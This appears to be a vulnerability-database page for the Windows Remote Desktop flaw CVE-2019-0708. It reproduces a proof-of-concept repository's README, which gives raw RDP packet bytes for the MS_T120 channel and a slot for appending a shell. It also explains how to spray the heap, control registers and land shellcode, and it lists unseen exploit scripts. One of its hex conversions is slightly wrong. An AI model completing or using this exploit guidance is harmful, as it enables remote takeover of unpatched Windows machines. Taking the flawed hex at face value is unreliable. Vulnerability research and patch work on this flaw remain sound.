Related vulnerability
Title:
Microsoft Remote Desktop Services resource management error vulnerability
(CVE-2019-0708)
Description: Microsoft Windows and Microsoft Windows Server are products of the US company Microsoft. Microsoft Windows is an operating system for personal devices. Microsoft Windows Server is a server operating system. Remote Desktop Services is one of its remote desktop service components. A resource management error vulnerability exists in Microsoft Remote Desktop Services. The vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by the network system or product. The following
Description
CVE-2019-0708-PoC is a semi-functional exploit capable of remotely accessing a Windows computer by exploiting the aforementioned vulnerability; this repository also contains notes on how to complete the attack.
Introduction
# CVE-2019-0708-PoC
CVE-2019-0708-PoC:
We are working on a fully functional exploit;
here there are pseudocodes and notes.
`"\x03\x00\x00\x0c\x02\xf0\x808\x00\x06MS_T120\x00\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",`
Adding payloads isn't very hard. You have to make the payload though; mine won't be shared.
All you have to do is find the correct spot.
`tls.sendall("payloadhex")`.
The first code is `"\x03\x00\x00\x0c\x02\xf0\x808\x00\x06"`; I think it's `"0300000c02f080380006"`,
as in `"dep": "0300000c02f080380006"`,
next is MS_T120 - it's `"4d535f5431323000000000"`,
so the first part must be `"030000c02f0803800064d535f5431323000000000$YourShell"`,
find the correct spot in the heap memory pool.
It's not insanely difficult; if you've exploited buffer overflows
then just do the same thing here (sort of).
Run a debugger on the RDP machine to watch the memory pool.
Setting the value of ECX to an actual memory address instead of "AAAAAAAAAAA"
will allow you to control the space of EAX,
where the shellcode needs to land,
achieved by heap spraying.
File snapshot
[4.0K] /data/pocs/db52faad9a1398e8705411e2fa875f8a0f555e0b
├── [ 17K] exp.py
├── [ 20K] poc.py
├── [1.2K] README.md
└── [ 163] setup.sh
0 directories, 4 files
Notes
1. It is recommended to access the code via the original source first.
2. If the source is no longer available or cannot be accessed, please email f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.